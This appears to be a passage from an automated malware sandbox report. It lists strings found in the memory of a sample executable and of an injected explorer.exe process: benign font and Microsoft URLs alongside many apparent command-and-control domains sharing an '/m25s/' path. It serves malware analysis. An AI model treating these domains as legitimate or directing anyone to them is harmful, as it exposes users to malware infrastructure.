          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealthcare-trends-60670.bond
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealthcare-trends-60670.bond/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealthcare-trends-60670.bondReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shopReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/www.wistlnc.net
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bondReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info/m25s/www.xewaov.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.infoReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond
          Source: explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bondReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design/m25s/www.orean-course-289113002.zone
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.designReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.top
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zoneReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou/m25s/www.cctofi.cpa
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyouReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.info
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.topReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp, n0srYVYMDI.exe, 00000000.00000002.1729852397.000000000637E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/www.vitor.live
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.todayReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live/m25s/www.raceg.cyou
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.liveReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/www.armanshop.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.netReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.39474.club
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyzReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000003.3495294226.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
